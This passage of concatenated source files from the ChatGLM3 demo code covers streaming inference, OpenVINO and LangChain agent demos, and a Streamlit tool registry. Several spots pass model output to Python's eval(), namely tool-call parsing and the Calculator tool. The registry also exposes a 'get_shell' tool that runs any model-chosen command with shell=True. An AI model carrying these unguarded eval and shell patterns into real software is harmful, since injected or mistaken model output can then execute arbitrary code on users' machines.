content.replace("[[训练时间]]", "2023年") else: if use_tool: content = "\n".join(content.split("\n")[1:-1]) def tool_call(**kwargs): return kwargs parameters = eval(content) content = { "name": metadata.strip(), "arguments": json.dumps(parameters, ensure_ascii=False) } else: content = { "name": metadata.strip(), "content": content } return content @torch.inference_mode() def generate_stream_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): messages = params["messages"] tools = params["tools"] temperature = float(params.get("temperature", 1.0)) repetition_penalty = float(params.get("repetition_penalty", 1.0)) top_p = float(params.get("top_p", 1.0)) max_new_tokens = int(params.get("max_tokens", 256)) echo = params.get("echo", True) messages = process_chatglm_messages(messages, tools=tools) query, role = messages[-1]["content"], messages[-1]["role"] inputs = tokenizer.build_chat_input(query, history=messages[:-1], role=role) inputs = inputs.to(model.device) input_echo_len = len(inputs["input_ids"][0]) if input_echo_len >= model.config.seq_length: print(f"Input length larger than {model.config.seq_length}") eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), ] gen_kwargs = { "max_new_tokens": max_new_tokens, "do_sample": True if temperature > 1e-5 else False, "top_p": top_p, "repetition_penalty": repetition_penalty, "logits_processor": [InvalidScoreLogitsProcessor()], } if temperature > 1e-5: gen_kwargs["temperature"] = temperature total_len = 0 for total_ids in model.stream_generate(**inputs, eos_token_id=eos_token_id, **gen_kwargs): total_ids = total_ids.tolist()[0] total_len = len(total_ids) if echo: output_ids = total_ids[:-1] else: output_ids = total_ids[input_echo_len:-1] response = tokenizer.decode(output_ids) if response and response[-1] != "�": response, stop_found = apply_stopping_strings(response, ["<|observation|>"]) yield { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": "function_call" if stop_found else None, } if stop_found: break # Only last stream result contains finish_reason, we set finish_reason as stop ret = { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": "stop", } yield ret gc.collect() torch.cuda.empty_cache() def process_chatglm_messages(messages, tools=None): _messages = messages messages = [] if tools: messages.append( { "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools } ) for m in _messages: role, content, func_call = m.role, m.content, m.function_call if role == "function": messages.append( { "role": "observation", "content": content } ) elif role == "assistant" and func_call is not None: for response in content.split("<|assistant|>"): metadata, sub_content = response.split("\n", maxsplit=1) messages.append( { "role": role, "metadata": metadata, "content": sub_content.strip() } ) else: messages.append({"role": role, "content": content}) return messages def generate_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): for response in generate_stream_chatglm3(model, tokenizer, params): pass return response def apply_stopping_strings(reply, stop_strings) -> Tuple[str, bool]: stop_found = False for string in stop_strings: idx = reply.find(string) if idx != -1: reply = reply[:idx] stop_found = True break if not stop_found: # If something like "\nYo" is generated just before "\nYou: is completed, trim it for string in stop_strings: for j in range(len(string) - 1, 0, -1): if reply[-j:] == string[:j]: reply = reply[:-j] break else: continue break return reply, stop_found File: Intel_device_demo/ipex_llm_cpu_demo/openai_api_request.py """ This script is an example of using the OpenAI API to create various interactions with a ChatGLM3 model. It includes functions to: 1. Conduct a basic chat session, asking about weather conditions in multiple cities. 2. Initiate a simple chat in Chinese, asking the model to tell a short story. 3. Retrieve and print embeddings for a given text input. Each function demonstrates a different aspect of the API's capabilities, showcasing how to make requests and handle responses. """ from openai import OpenAI import time base_url = "http://127.0.0.1:8000/v1/" client = OpenAI(api_key="EMPTY", base_url=base_url) def function_chat(): messages = [{"role": "user", "content": "What's the weather like in San Francisco, Tokyo, and Paris?"}] tools = [ { "type": "function", "function": { "name": "get_current_weather", "description": "Get the current weather in a given location", "parameters": { "type": "object", "properties": { "location": { "type": "string", "description": "The city and state, e.g. San Francisco, CA", }, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, }, "required": ["location"], }, }, } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, tools=tools, tool_choice="auto", ) if response: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) def simple_chat(use_stream=True): messages = [ { "role": "system", "content": "You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's " "instructions carefully. Respond using markdown.", }, { "role": "user", "content": "你好,请你用生动的话语给我讲一个小故事吧" } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, stream=use_stream, max_tokens=256, temperature=0.8, presence_penalty=1.1, top_p=0.8) if response: if use_stream: for chunk in response: print(chunk.choices[0].delta.content) else: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) if __name__ == "__main__": simple_chat(use_stream=False) simple_chat(use_stream=True) File: Intel_device_demo/openvino_demo/openvino_cli_demo.py import argparse from typing import List, Tuple from threading import Thread import torch from optimum.intel.openvino import OVModelForCausalLM from transformers import (AutoTokenizer, AutoConfig, TextIteratorStreamer, StoppingCriteriaList, StoppingCriteria) def parse_text(text): lines = text.split("\n") lines = [line for line in lines if line != ""] count = 0 for i, line in enumerate(lines): if "```" in line: count += 1 items = line.split('`') if count % 2 == 1: lines[i] = f'<pre><code class="language-{items[-1]}">' else: lines[i] = f'<br></code></pre>' else: if i > 0: if count % 2 == 1: line = line.replace("`", "\`") line = line.replace("<", "&lt;") line = line.replace(">", "&gt;") line = line.replace(" ", "&nbsp;") line = line.replace("*", "&ast;") line = line.replace("_", "&lowbar;") line = line.replace("-", "&#45;") line = line.replace(".", "&#46;") line = line.replace("!", "&#33;") line = line.replace("(", "&#40;") line = line.replace(")", "&#41;") line = line.replace("$", "&#36;") lines[i] = "<br>" + line text = "".join(lines) return text class StopOnTokens(StoppingCriteria): def __init__(self, token_ids): self.token_ids = token_ids def __call__( self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs ) -> bool: for stop_id in self.token_ids: if input_ids[0][-1] == stop_id: return True return False if __name__ == "__main__": parser = argparse.ArgumentParser(add_help=False) parser.add_argument('-h', '--help', action='help', help='Show this help message and exit.') parser.add_argument('-m', '--model_path', required=True, type=str, help='Required. model path') parser.add_argument('-l', '--max_sequence_length', default=256, required=False, type=int, help='Required. maximun length of output') parser.add_argument('-d', '--device', default='CPU', required=False, type=str, help='Required. device for inference') args = parser.parse_args() model_dir = args.model_path ov_config = {"PERFORMANCE_HINT": "LATENCY", "NUM_STREAMS": "1", "CACHE_DIR": ""} tokenizer = AutoTokenizer.from_pretrained( model_dir, trust_remote_code=True) print("====Compiling model====") ov_model = OVModelForCausalLM.from_pretrained( model_dir, device=args.device, ov_config=ov_config, config=AutoConfig.from_pretrained(model_dir, trust_remote_code=True), trust_remote_code=True, ) streamer = TextIteratorStreamer( tokenizer, timeout=60.0, skip_prompt=True, skip_special_tokens=True ) stop_tokens = [0, 2] stop_tokens = [StopOnTokens(stop_tokens)] def convert_history_to_token(history: List[Tuple[str, str]]): messages = [] for idx, (user_msg, model_msg) in enumerate(history): if idx == len(history) - 1 and not model_msg: messages.append({"role": "user", "content": user_msg}) break if user_msg: messages.append({"role": "user", "content": user_msg}) if model_msg: messages.append({"role": "assistant", "content": model_msg}) model_inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=True, return_tensors="pt") return model_inputs history = [] print("====Starting conversation====") while True: input_text = input("用户: ") if input_text.lower() == 'stop': break if input_text.lower() == 'clear': history = [] print("AI助手: 对话历史已清空") continue print("ChatGLM3-6B-OpenVINO:", end=" ") history = history + [[parse_text(input_text), ""]] model_inputs = convert_history_to_token(history) generate_kwargs = dict( input_ids=model_inputs, max_new_tokens=args.max_sequence_length, temperature=0.1, do_sample=True, top_p=1.0, top_k=50, repetition_penalty=1.1, streamer=streamer, stopping_criteria=StoppingCriteriaList(stop_tokens) ) t1 = Thread(target=ov_model.generate, kwargs=generate_kwargs) t1.start() partial_text = "" for new_text in streamer: new_text = new_text print(new_text, end="", flush=True) partial_text += new_text print("\n") history[-1][1] = partial_text File: langchain_demo/ChatGLM3.py import ast import json from langchain.llms.base import LLM from transformers import AutoTokenizer, AutoModel, AutoConfig from typing import List, Optional class ChatGLM3(LLM): max_token: int = 8192 do_sample: bool = True temperature: float = 0.8 top_p = 0.8 tokenizer: object = None model: object = None history: List = [] has_search: bool = False def __init__(self): super().__init__() @property def _llm_type(self) -> str: return "ChatGLM3" def load_model(self, model_name_or_path=None): model_config = AutoConfig.from_pretrained( model_name_or_path, trust_remote_code=True ) self.tokenizer = AutoTokenizer.from_pretrained( model_name_or_path, trust_remote_code=True ) self.model = AutoModel.from_pretrained( model_name_or_path, config=model_config, trust_remote_code=True, device_map="auto").eval() def _tool_history(self, prompt: str): ans = [] tool_prompts = prompt.split( "You have access to the following tools:\n\n")[1].split("\n\nUse a json blob")[0].split("\n") tools_json = [] for tool_desc in tool_prompts: name = tool_desc.split(":")[0] description = tool_desc.split(", args:")[0].split(":")[0].strip() parameters_str = tool_desc.split("args:")[1].strip() parameters_dict = ast.literal_eval(parameters_str) params_cleaned = {} for param, details in parameters_dict.items(): params_cleaned[param] = {'description': details['description'], 'type': details['type']} tools_json.append({ "name": name, "description": description, "parameters": params_cleaned }) ans.append({ "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools_json }) dialog_parts = prompt.split("Human: ") for part in dialog_parts[1:]: if "\nAI: " in part: user_input, ai_response = part.split("\nAI: ") ai_response = ai_response.split("\n")[0] else: user_input = part ai_response = None ans.append({"role": "user", "content": user_input.strip()}) if ai_response: ans.append({"role": "assistant", "content": ai_response.strip()}) query = dialog_parts[-1].split("\n")[0] return ans, query def _extract_observation(self, prompt: str): return_json = prompt.split("Observation: ")[-1].split("\nThought:")[0] self.history.append({ "role": "observation", "content": return_json }) return def _extract_tool(self): if len(self.history[-1]["metadata"]) > 0: metadata = self.history[-1]["metadata"] content = self.history[-1]["content"] lines = content.split('\n') for line in lines: if 'tool_call(' in line and ')' in line and self.has_search is False: # 获取括号内的字符串 params_str = line.split('tool_call(')[-1].split(')')[0] # 解析参数对 params_pairs = [param.split("=") for param in params_str.split(",") if "=" in param] params = {pair[0].strip(): pair[1].strip().strip("'\"") for pair in params_pairs} action_json = { "action": metadata, "action_input": params } self.has_search = True print("*****Action*****") print(action_json) print("*****Answer*****") return f""" Action: ``` {json.dumps(action_json, ensure_ascii=False)} ```""" final_answer_json = { "action": "Final Answer", "action_input": self.history[-1]["content"] } self.has_search = False return f""" Action: ``` {json.dumps(final_answer_json, ensure_ascii=False)} ```""" def _call(self, prompt: str, history: List = [], stop: Optional[List[str]] = ["<|user|>"]): if not self.has_search: self.history, query = self._tool_history(prompt) else: self._extract_observation(prompt) query = "" _, self.history = self.model.chat( self.tokenizer, query, history=self.history, do_sample=self.do_sample, max_length=self.max_token, temperature=self.temperature, ) response = self._extract_tool() history.append((prompt, response)) return response File: langchain_demo/main.py """ This script demonstrates the use of the LangChain's StructuredChatAgent and AgentExecutor alongside various tools The script utilizes the ChatGLM3 model, a large language model for understanding and generating human-like text. The model is loaded from a specified path and integrated into the chat agent. Tools: - Calculator: Performs arithmetic calculations. - Weather: Provides weather-related information based on input queries. - DistanceConverter: Converts distances between meters, kilometers, and feet. The agent operates in three modes: 1. Single Parameter without History: Uses Calculator to perform simple arithmetic. 2. Single Parameter with History: Uses Weather tool to answer queries about temperature, considering the conversation history. 3. Multiple Parameters without History: Uses DistanceConverter to convert distances between specified units. 4. Single use Langchain Tool: Uses Arxiv tool to search for scientific articles. Note: The model calling tool fails, which may cause some errors or inability to execute. Try to reduce the temperature parameters of the model, or reduce the number of tools, especially the third function. The success rate of multi-parameter calling is low. The following errors may occur: Required fields [type=missing, input_value={'distance': '30', 'unit': 'm', 'to': 'km'}, input_type=dict] The model illusion in this case generates parameters that do not meet the requirements. The top_p and temperature parameters of the model should be adjusted to better solve such problems. Success example: *****Action***** { 'action': 'weather', 'action_input': { 'location': '厦门' } } *****Answer***** { 'input': '厦门比北京热吗?', 'chat_history': [HumanMessage(content='北京温度多少度'), AIMessage(content='北京现在12度')], 'output': '根据最新的天气数据,厦门今天的气温为18度,天气晴朗。而北京今天的气温为12度。所以,厦门比北京热。' } **************** """ import os from langchain import hub from langchain.agents import AgentExecutor, create_structured_chat_agent, load_tools from langchain_core.messages import AIMessage, HumanMessage from ChatGLM3 import ChatGLM3 from tools.Calculator import Calculator from tools.Weather import Weather from tools.DistanceConversion import DistanceConverter MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') if __name__ == "__main__": llm = ChatGLM3() llm.load_model(MODEL_PATH) prompt = hub.pull("hwchase17/structured-chat-agent") # for single parameter without history tools = [Calculator()] agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke({"input": "34 * 34"}) print(ans) # for singe parameter with history tools = [Weather()] agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke( { "input": "厦门比北京热吗?", "chat_history": [ HumanMessage(content="北京温度多少度"), AIMessage(content="北京现在12度"), ], } ) print(ans) # for multiple parameters without history tools = [DistanceConverter()] agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke({"input": "how many meters in 30 km?"}) print(ans) # for using langchain tools tools = load_tools(["arxiv"], llm=llm) agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke({"input": "Describe the paper about GLM 130B"}) print(ans) File: langchain_demo/tools/Weather.py import os import requests from typing import Type, Any from langchain.tools import BaseTool from pydantic import BaseModel, Field class WeatherInput(BaseModel): location: str = Field(description="the location need to check the weather") class Weather(BaseTool): name = "weather" description = "Use for searching weather at a specific location" args_schema: Type[BaseModel] = WeatherInput def __init__(self): super().__init__() def _run(self, location: str) -> dict[str, Any]: api_key = os.environ["SENIVERSE_KEY"] url = f"https://api.seniverse.com/v3/weather/now.json?key={api_key}&location={location}&language=zh-Hans&unit=c" response = requests.get(url) if response.status_code == 200: data = response.json() weather = { "temperature": data["results"][0]["now"]["temperature"], "description": data["results"][0]["now"]["text"], } return weather else: raise Exception( f"Failed to retrieve weather: {response.status_code}") File: langchain_demo/tools/Calculator.py import abc import re from typing import Type from langchain.tools import BaseTool from pydantic import BaseModel, Field class CalculatorInput(BaseModel): calculation: str = Field(description="calculation to perform") class Calculator(BaseTool, abc.ABC): name = "Calculator" description = "Useful for when you need to calculate math problems" args_schema: Type[BaseModel] = CalculatorInput def __init__(self): super().__init__() def parameter_validation(self, para: str): """ You can write your own parameter validation rules here, you can refer to the code given here. :param para: :return: """ symbols = ["math", "sqrt", "log", "sin", "cos", "tan", "pi"] for sym in symbols: para = para.replace(sym, "") patten = re.compile("[+*/\-%\d()=\s.]{3,}") if re.findall(patten, para): return True def _run(self, calculation: str) -> str: calculation = calculation.replace("^", "**") if "sqrt" in calculation and "math" not in calculation: calculation = calculation.replace("sqrt", "math.sqrt") if "log" in calculation and "math" not in calculation: calculation = calculation.replace("log", "math.log") if "sin" in calculation and "math" not in calculation: calculation = calculation.replace("sin", "math.sin") if "cos" in calculation and "math" not in calculation: calculation = calculation.replace("cos", "math.cos") if "tan" in calculation and "math" not in calculation: calculation = calculation.replace("tan", "math.tan") if "pi" in calculation and "math" not in calculation: calculation = calculation.replace("pi", "math.pi") if "pI" in calculation and "math" not in calculation: calculation = calculation.replace("pI", "math.pi") if "PI" in calculation and "math" not in calculation: calculation = calculation.replace("PI", "math.pi") if "Pi" in calculation and "math" not in calculation: calculation = calculation.replace("Pi", "math.pi") return eval(calculation) File: langchain_demo/tools/DistanceConversion.py import abc from typing import Type from langchain.tools import BaseTool from pydantic import BaseModel, Field class DistanceConversionInput(BaseModel): distance: float = Field(description="The numerical value of the distance to convert") unit: str = Field(description="The current unit of the distance (m, km, or feet)") to_unit: str = Field(description="The target unit to convert the distance into (m, km, or feet)") class DistanceConverter(BaseTool, abc.ABC): name = "DistanceConverter" description = "Converts distance between meters, kilometers, and feet" args_schema: Type[BaseModel] = DistanceConversionInput def __init__(self): super().__init__() def _run(self, distance: float, unit: str, to_unit: str) -> str: unit_conversions = { "m_to_km": 0.001, "km_to_m": 1000, "feet_to_m": 0.3048, "m_to_feet": 3.28084, "km_to_feet": 3280.84, "feet_to_km": 0.0003048 } if unit == to_unit: return f"{distance} {unit} is equal to {distance} {to_unit}" if unit == "km": distance *= unit_conversions["km_to_m"] elif unit == "feet": distance *= unit_conversions["feet_to_m"] if to_unit == "km": converted_distance = distance * unit_conversions["m_to_km"] elif to_unit == "feet": converted_distance = distance * unit_conversions["m_to_feet"] else: converted_distance = distance # already in meters if this block is reached return f"{distance} {unit} is equal to {converted_distance} {to_unit}" File: composite_demo/conversation.py from dataclasses import dataclass from enum import auto, Enum import json from PIL.Image import Image import streamlit as st from streamlit.delta_generator import DeltaGenerator TOOL_PROMPT = 'Answer the following questions as best as you can. You have access to the following tools:\n' class Role(Enum): SYSTEM = auto() USER = auto() ASSISTANT = auto() TOOL = auto() INTERPRETER = auto() OBSERVATION = auto() def __str__(self): match self: case Role.SYSTEM: return "<|system|>" case Role.USER: return "<|user|>" case Role.ASSISTANT | Role.TOOL | Role.INTERPRETER: return "<|assistant|>" case Role.OBSERVATION: return "<|observation|>" # Get the message block for the given role def get_message(self): # Compare by value here, because the enum object in the session state # is not the same as the enum cases here, due to streamlit's rerunning # behavior. match self.value: case Role.SYSTEM.value: return case Role.USER.value: return st.chat_message(name="user", avatar="user") case Role.ASSISTANT.value: return st.chat_message(name="assistant", avatar="assistant") case Role.TOOL.value: return st.chat_message(name="tool", avatar="assistant") case Role.INTERPRETER.value: return st.chat_message(name="interpreter", avatar="assistant") case Role.OBSERVATION.value: return st.chat_message(name="observation", avatar="user") case _: st.error(f'Unexpected role: {self}') @dataclass class Conversation: role: Role content: str tool: str | None = None image: Image | None = None def __str__(self) -> str: print(self.role, self.content, self.tool) match self.role: case Role.SYSTEM | Role.USER | Role.ASSISTANT | Role.OBSERVATION: return f'{self.role}\n{self.content}' case Role.TOOL: return f'{self.role}{self.tool}\n{self.content}' case Role.INTERPRETER: return f'{self.role}interpreter\n{self.content}' # Human readable format def get_text(self) -> str: text = postprocess_text(self.content) match self.role.value: case Role.TOOL.value: text = f'Calling tool `{self.tool}`:\n\n{text}' case Role.INTERPRETER.value: text = f'{text}' case Role.OBSERVATION.value: text = f'Observation:\n```\n{text}\n```' return text # Display as a markdown block def show(self, placeholder: DeltaGenerator | None=None) -> str: if placeholder: message = placeholder else: message = self.role.get_message() if self.image: message.image(self.image) else: text = self.get_text() message.markdown(text) def preprocess_text( system: str | None, tools: list[dict] | None, history: list[Conversation], ) -> str: if tools: tools = json.dumps(tools, indent=4, ensure_ascii=False) prompt = f"{Role.SYSTEM}\n" prompt += system if not tools else TOOL_PROMPT if tools: tools = json.loads(tools) prompt += json.dumps(tools, ensure_ascii=False) for conversation in history: prompt += f'{conversation}' prompt += f'{Role.ASSISTANT}\n' return prompt def postprocess_text(text: str) -> str: text = text.replace("\(", "$") text = text.replace("\)", "$") text = text.replace("\[", "$$") text = text.replace("\]", "$$") text = text.replace("<|assistant|>", "") text = text.replace("<|observation|>", "") text = text.replace("<|system|>", "") text = text.replace("<|user|>", "") return text.strip() File: composite_demo/client.py from __future__ import annotations import os import streamlit as st import torch from collections.abc import Iterable from typing import Any, Protocol from huggingface_hub.inference._text_generation import TextGenerationStreamResponse, Token from transformers import AutoModel, AutoTokenizer, AutoConfig from transformers.generation.logits_process import LogitsProcessor from transformers.generation.utils import LogitsProcessorList from conversation import Conversation TOOL_PROMPT = 'Answer the following questions as best as you can. You have access to the following tools:' MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') PT_PATH = os.environ.get('PT_PATH', None) PRE_SEQ_LEN = int(os.environ.get("PRE_SEQ_LEN", 128)) TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) @st.cache_resource def get_client() -> Client: client = HFClient(MODEL_PATH, TOKENIZER_PATH, PT_PATH) return client class Client(Protocol): def generate_stream(self, system: str | None, tools: list[dict] | None, history: list[Conversation], **parameters: Any ) -> Iterable[TextGenerationStreamResponse]: ... def stream_chat( self, tokenizer, query: str, history: list[tuple[str, str]] = None, role: str = "user", past_key_values=None, max_new_tokens: int = 256, do_sample=True, top_p=0.8, temperature=0.8, repetition_penalty=1.0, length_penalty=1.0, num_beams=1, logits_processor=None, return_past_key_values=False, **kwargs ): class InvalidScoreLogitsProcessor(LogitsProcessor): def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor) -> torch.FloatTensor: if torch.isnan(scores).any() or torch.isinf(scores).any(): scores.zero_() scores[..., 5] = 5e4 return scores if history is None: history = [] print("\n== Input ==\n", query) print("\n==History==\n", history) if logits_processor is None: logits_processor = LogitsProcessorList() logits_processor.append(InvalidScoreLogitsProcessor()) eos_token_id = [tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), tokenizer.get_command("<|observation|>")] gen_kwargs = {"max_new_tokens": max_new_tokens, "do_sample": do_sample, "top_p": top_p, "temperature": temperature, "logits_processor": logits_processor, "repetition_penalty": repetition_penalty, "length_penalty": length_penalty, "num_beams": num_beams, **kwargs } if past_key_values is None: inputs = tokenizer.build_chat_input(query, history=history, role=role) else: inputs = tokenizer.build_chat_input(query, role=role) inputs = inputs.to(self.device) if past_key_values is not None: past_length = past_key_values[0][0].shape[0] if self.transformer.pre_seq_len is not None: past_length -= self.transformer.pre_seq_len inputs.position_ids += past_length attention_mask = inputs.attention_mask attention_mask = torch.cat((attention_mask.new_ones(1, past_length), attention_mask), dim=1) inputs['attention_mask'] = attention_mask history.append({"role": role, "content": query}) input_sequence_length = inputs['input_ids'].shape[1] if input_sequence_length + max_new_tokens >= self.config.seq_length: yield "Current input sequence length {} plus max_new_tokens {} is too long. The maximum model sequence length is {}. You may adjust the generation parameter to enable longer chat history.".format( input_sequence_length, max_new_tokens, self.config.seq_length ), history return if input_sequence_length > self.config.seq_length: yield "Current input sequence length {} exceeds maximum model sequence length {}. Unable to generate tokens.".format( input_sequence_length, self.config.seq_length ), history return for outputs in self.stream_generate(**inputs, past_key_values=past_key_values, eos_token_id=eos_token_id, return_past_key_values=return_past_key_values, **gen_kwargs): if return_past_key_values: outputs, past_key_values = outputs outputs = outputs.tolist()[0][len(inputs["input_ids"][0]):] response = tokenizer.decode(outputs) if response and response[-1] != "�": new_history = history if return_past_key_values: yield response, new_history, past_key_values else: yield response, new_history class HFClient(Client): def __init__(self, model_path: str, tokenizer_path: str, pt_checkpoint: str = None): self.model_path = model_path self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_path, trust_remote_code=True) if pt_checkpoint is not None and os.path.exists(pt_checkpoint): config = AutoConfig.from_pretrained( model_path, trust_remote_code=True, pre_seq_len=PRE_SEQ_LEN ) self.model = AutoModel.from_pretrained( model_path, trust_remote_code=True, config=config, device_map="auto").eval() # add .quantize(bits=4, device="cuda").cuda() before .eval() and remove device_map="auto" to use int4 model # must use cuda to load int4 model prefix_state_dict = torch.load(os.path.join(pt_checkpoint, "pytorch_model.bin")) new_prefix_state_dict = {} for k, v in prefix_state_dict.items(): if k.startswith("transformer.prefix_encoder."): new_prefix_state_dict[k[len("transformer.prefix_encoder."):]] = v print("Loaded from pt checkpoints", new_prefix_state_dict.keys()) self.model.transformer.prefix_encoder.load_state_dict(new_prefix_state_dict) else: self.model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() # add .quantize(bits=4, device="cuda").cuda() before .eval() and remove device_map="auto" to use int4 model # must use cuda to load int4 model def generate_stream( self, system: str | None, tools: list[dict] | None, history: list[Conversation], **parameters: Any ) -> Iterable[TextGenerationStreamResponse]: chat_history = [{ 'role': 'system', 'content': system if not tools else TOOL_PROMPT, }] if tools: chat_history[0]['tools'] = tools for conversation in history[:-1]: chat_history.append({ 'role': str(conversation.role).removeprefix('<|').removesuffix('|>'), 'content': conversation.content, }) query = history[-1].content role = str(history[-1].role).removeprefix('<|').removesuffix('|>') text = '' for new_text, _ in stream_chat( self.model, self.tokenizer, query, chat_history, role, **parameters, ): word = new_text.removeprefix(text) word_stripped = word.strip() text = new_text yield TextGenerationStreamResponse( generated_text=text, token=Token( id=0, logprob=0, text=word, special=word_stripped.startswith('<|') and word_stripped.endswith('|>'), ) ) File: composite_demo/tool_registry.py """ This code is the tool registration part. By registering the tool, the model can call the tool. This code provides extended functionality to the model, enabling it to call and interact with a variety of utilities through defined interfaces. """ import copy import inspect from pprint import pformat import traceback from types import GenericAlias from typing import get_origin, Annotated import subprocess _TOOL_HOOKS = {} _TOOL_DESCRIPTIONS = {} def register_tool(func: callable): tool_name = func.__name__ tool_description = inspect.getdoc(func).strip() python_params = inspect.signature(func).parameters tool_params = [] for name, param in python_params.items(): annotation = param.annotation if annotation is inspect.Parameter.empty: raise TypeError(f"Parameter `{name}` missing type annotation") if get_origin(annotation) != Annotated: raise TypeError(f"Annotation type for `{name}` must be typing.Annotated") typ, (description, required) = annotation.__origin__, annotation.__metadata__ typ: str = str(typ) if isinstance(typ, GenericAlias) else typ.__name__ if not isinstance(description, str): raise TypeError(f"Description for `{name}` must be a string") if not isinstance(required, bool): raise TypeError(f"Required for `{name}` must be a bool") tool_params.append({ "name": name, "description": description, "type": typ, "required": required }) tool_def = { "name": tool_name, "description": tool_description, "params": tool_params } print("[registered tool] " + pformat(tool_def)) _TOOL_HOOKS[tool_name] = func _TOOL_DESCRIPTIONS[tool_name] = tool_def return func def dispatch_tool(tool_name: str, tool_params: dict) -> str: if tool_name not in _TOOL_HOOKS: return f"Tool `{tool_name}` not found. Please use a provided tool." tool_call = _TOOL_HOOKS[tool_name] try: ret = tool_call(**tool_params) except: ret = traceback.format_exc() return str(ret) def get_tools() -> dict: return copy.deepcopy(_TOOL_DESCRIPTIONS) # Tool Definitions @register_tool def random_number_generator( seed: Annotated[int, 'The random seed used by the generator', True], range: Annotated[tuple[int, int], 'The range of the generated numbers', True], ) -> int: """ Generates a random number x, s.t. range[0] <= x < range[1] """ if not isinstance(seed, int): raise TypeError("Seed must be an integer") if not isinstance(range, tuple): raise TypeError("Range must be a tuple") if not isinstance(range[0], int) or not isinstance(range[1], int): raise TypeError("Range must be a tuple of integers") import random return random.Random(seed).randint(*range) @register_tool def get_weather( city_name: Annotated[str, 'The name of the city to be queried', True], ) -> str: """ Get the current weather for `city_name` """ if not isinstance(city_name, str): raise TypeError("City name must be a string") key_selection = { "current_condition": ["temp_C", "FeelsLikeC", "humidity", "weatherDesc", "observation_time"], } import requests try: resp = requests.get(f"https://wttr.in/{city_name}?format=j1") resp.raise_for_status() resp = resp.json() ret = {k: {_v: resp[k][0][_v] for _v in v} for k, v in key_selection.items()} except: import traceback ret = "Error encountered while fetching weather data!\n" + traceback.format_exc() return str(ret) @register_tool def get_shell( query: Annotated[str, 'The command should run in Linux shell', True], ) -> str: """ Use shell to run command """ if not isinstance(query, str): raise TypeError("Command must be a string") try: result = subprocess.run(query, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) return result.stdout except subprocess.CalledProcessError as e: return e.stderr if __name__ == "__main__": # print(dispatch_tool("get_shell", {"query": "pwd"})) print(get_tools()) File: composite_demo/demo_tool.py import re import yaml from yaml import YAMLError import streamlit as st from streamlit.delta_generator import DeltaGenerator from client import get_client from conversation import postprocess_text, preprocess_text, Conversation, Role from tool_registry import dispatch_tool, get_tools EXAMPLE_TOOL = { "name": "get_current_weather", "description": "Get the current weather in a given location", "parameters": { "type": "object", "properties": { "location": { "type": "string", "description": "The city and state, e.g. San Francisco, CA", }, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, }, "required": ["location"], } } client = get_client() def tool_call(*args, **kwargs) -> dict: print("=== Tool call===") print(args) print(kwargs) st.session_state.calling_tool = True return kwargs def yaml_to_dict(tools: str) -> list[dict] | None: try: return yaml.safe_load(tools) except YAMLError: return None def extract_code(text: str) -> str: pattern = r'```([^\n]*)\n(.*?)```' matches = re.findall(pattern, text, re.DOTALL) print(matches) return matches[-1][1] # Append a conversation into history, while show it in a new markdown block def append_conversation( conversation: Conversation, history: list[Conversation], placeholder: DeltaGenerator | None = None, ) -> None: history.append(conversation) conversation.show(placeholder) def main( prompt_text: str, top_p: float = 0.2, temperature: float = 0.1, repetition_penalty: float = 1.1, max_new_tokens: int = 1024, truncate_length: int = 1024, retry: bool = False ): manual_mode = st.toggle('Manual mode', help='Define your tools in YAML format. You need to supply tool call results manually.' ) if manual_mode: with st.expander('Tools'): tools = st.text_area( 'Define your tools in YAML format here:', yaml.safe_dump([EXAMPLE_TOOL], sort_keys=False), height=400, ) tools = yaml_to_dict(tools) if not tools: st.error('YAML format error in tools definition') else: tools = get_tools() if 'tool_history' not in st.session_state: st.session_state.tool_history = [] if 'calling_tool' not in st.session_state: st.session_state.calling_tool = False if 'chat_history' not in st.session_state: st.session_state.chat_history = [] if prompt_text == "" and retry == False: print("\n== Clean ==\n") st.session_state.chat_history = [] return history: list[Conversation] = st.session_state.chat_history for conversation in history: conversation.show() if retry: print("\n== Retry ==\n") last_user_conversation_idx = None for idx, conversation in enumerate(history): if conversation.role == Role.USER: last_user_conversation_idx = idx if last_user_conversation_idx is not None: prompt_text = history[last_user_conversation_idx].content del history[last_user_conversation_idx:] if prompt_text: prompt_text = prompt_text.strip() role = st.session_state.calling_tool and Role.OBSERVATION or Role.USER append_conversation(Conversation(role, prompt_text), history) st.session_state.calling_tool = False placeholder = st.container() message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() for _ in range(5): output_text 